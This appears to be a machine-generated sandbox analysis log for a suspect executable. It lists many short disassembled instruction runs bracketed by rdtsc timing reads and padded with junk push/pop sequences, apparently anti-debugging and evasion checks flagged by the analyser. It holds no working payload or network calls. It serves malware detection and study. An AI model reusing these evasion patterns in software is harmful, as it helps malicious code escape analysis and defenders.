Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122788 second address: 112281B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnp 00007FAAF912802Eh 0x0000000d jng 00007FAAF9128028h 0x00000013 nop 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007FAAF9128028h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 0000001Dh 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov dword ptr [ebp+1247ACBCh], ebx 0x00000034 push 00000004h 0x00000036 push 00000000h 0x00000038 push esi 0x00000039 call 00007FAAF9128028h 0x0000003e pop esi 0x0000003f mov dword ptr [esp+04h], esi 0x00000043 add dword ptr [esp+04h], 0000001Ch 0x0000004b inc esi 0x0000004c push esi 0x0000004d ret 0x0000004e pop esi 0x0000004f ret 0x00000050 adc dl, FFFFFFCAh 0x00000053 nop 0x00000054 jmp 00007FAAF9128038h 0x00000059 push eax 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007FAAF912802Dh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122FCD second address: 1122FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E484 second address: 115E48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E48A second address: 115E48E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E48E second address: 115E4A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF9128032h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E4A6 second address: 115E4CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAF8FC5099h 0x00000008 pushad 0x00000009 popad 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FAAF8FC5086h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E649 second address: 115E667 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007FAAF9128039h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E92D second address: 115E939 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jo 00007FAAF8FC5086h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E939 second address: 115E93D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E93D second address: 115E949 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E949 second address: 115E94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115E94D second address: 115E951 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 115EAA6 second address: 115EAAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11638B2 second address: 11638C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAF8FC508Dh 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163BD2 second address: 1163C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FAAF912802Ch 0x0000000a pop esi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007FAAF9128033h 0x00000013 jmp 00007FAAF9128031h 0x00000018 popad 0x00000019 push ebx 0x0000001a push edx 0x0000001b pop edx 0x0000001c jo 00007FAAF9128026h 0x00000022 pop ebx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163C16 second address: 1163C21 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007FAAF8FC5086h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163D7C second address: 1163D82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163D82 second address: 1163D93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FAAF8FC5086h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163EFC second address: 1163F00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163F00 second address: 1163F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1163F0A second address: 1163F0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11645DA second address: 11645EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC508Ah 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11645EC second address: 11645F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11645F2 second address: 1164628 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC5098h 0x00000009 jmp 00007FAAF8FC5095h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1164628 second address: 116462C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 116462C second address: 1164632 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1164632 second address: 1164645 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 je 00007FAAF9128028h 0x0000000e push edi 0x0000000f pop edi 0x00000010 push ebx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1164D1D second address: 1164D45 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FAAF8FC509Fh 0x0000000c push edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11635B6 second address: 1163608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 pushad 0x00000008 push esi 0x00000009 pop esi 0x0000000a jmp 00007FAAF9128035h 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007FAAF9128037h 0x00000016 popad 0x00000017 jnp 00007FAAF912802Ch 0x0000001d ja 00007FAAF9128026h 0x00000023 jbe 00007FAAF912802Ah 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 116B336 second address: 116B34E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Ah 0x00000007 jng 00007FAAF8FC5086h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push esi 0x00000012 pop esi 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 116B34E second address: 116B354 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1173ED2 second address: 1173ED6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1173ED6 second address: 1173EE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jp 00007FAAF9128026h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1122A47 second address: 1122A58 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117450F second address: 1174538 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007FAAF9128033h 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FAAF912802Fh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117505C second address: 1175075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop eax 0x00000007 jc 00007FAAF8FC5092h 0x0000000d jbe 00007FAAF8FC5086h 0x00000013 jnl 00007FAAF8FC5086h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11795E4 second address: 11795F4 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FAAF9128026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117CF58 second address: 117CF7C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FAAF8FC5096h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jbe 00007FAAF8FC5086h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117CF7C second address: 117CF80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117CF80 second address: 117CF86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117C8A2 second address: 117C8A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 117CA1A second address: 117CA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAAF8FC5095h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1182CCA second address: 1182CD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1182FE9 second address: 1182FF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1182FF3 second address: 1183001 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FAAF9128026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1183001 second address: 1183005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11832D4 second address: 11832DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11835AA second address: 11835AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11835AE second address: 11835C7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FAAF9128030h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1183B31 second address: 1183B35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1183B35 second address: 1183B4C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FAAF9128026h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FAAF912802Dh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1183B4C second address: 1183B54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1183B54 second address: 1183B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 118415A second address: 1184166 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FAAF8FC5086h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 118440D second address: 1184438 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FAAF9128028h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FAAF9128035h 0x00000013 je 00007FAAF9128026h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1189390 second address: 11893C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF8FC508Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007FAAF8FC5094h 0x0000000f jmp 00007FAAF8FC508Ah 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1188B74 second address: 1188B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 118DDF2 second address: 118DDF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 118DDF7 second address: 118DE0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FAAF912802Dh 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11963A4 second address: 11963E9 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FAAF8FC5088h 0x0000000c push eax 0x0000000d pop eax 0x0000000e pushad 0x0000000f jg 00007FAAF8FC5086h 0x00000015 pushad 0x00000016 popad 0x00000017 pushad 0x00000018 popad 0x00000019 jmp 00007FAAF8FC5091h 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007FAAF8FC5096h 0x00000026 push edi 0x00000027 pop edi 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1196599 second address: 11965A3 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11965A3 second address: 11965A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11965A7 second address: 11965C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128037h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11966F4 second address: 1196707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 pushad 0x00000007 popad 0x00000008 jnc 00007FAAF8FC5086h 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 1196707 second address: 1196737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF9128037h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jc 00007FAAF9128039h 0x0000000f jmp 00007FAAF912802Dh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 119B637 second address: 119B649 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jnl 00007FAAF8FC5086h 0x0000000c jc 00007FAAF8FC5086h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 119E9C7 second address: 119E9DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF912802Fh 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A9BF8 second address: 11A9BFE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A9BFE second address: 11A9C04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A9C04 second address: 11A9C21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC5097h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A9C21 second address: 11A9C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edi 0x00000008 pop edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A991F second address: 11A992E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edi 0x00000007 jc 00007FAAF8FC508Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A992E second address: 11A9934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A9934 second address: 11A993A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11A993A second address: 11A993E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11AC376 second address: 11AC392 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FAAF8FC5098h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11AC392 second address: 11AC3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAF912802Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b je 00007FAAF9128026h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C6D6A second address: 11C6D8D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a jns 00007FAAF8FC5086h 0x00000010 jmp 00007FAAF8FC5092h 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C6D8D second address: 11C6DA2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAF9128030h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C707D second address: 11C7082 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C7613 second address: 11C7618 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C7618 second address: 11C7622 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FAAF8FC5086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C7622 second address: 11C7643 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FAAF9128035h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C7643 second address: 11C7648 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C7648 second address: 11C7654 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FAAF9128026h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C7654 second address: 11C766C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC508Fh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C77B7 second address: 11C77BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C77BB second address: 11C77D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jno 00007FAAF8FC5092h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C77D3 second address: 11C77D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C77D9 second address: 11C77EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FAAF8FC508Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C81C3 second address: 11C81D3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007FAAF9128026h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BVGvbpplT8.exe RDTSC instruction interceptor: First address: 11C81D3 second address: 11C81E1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FAAF8FC508Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
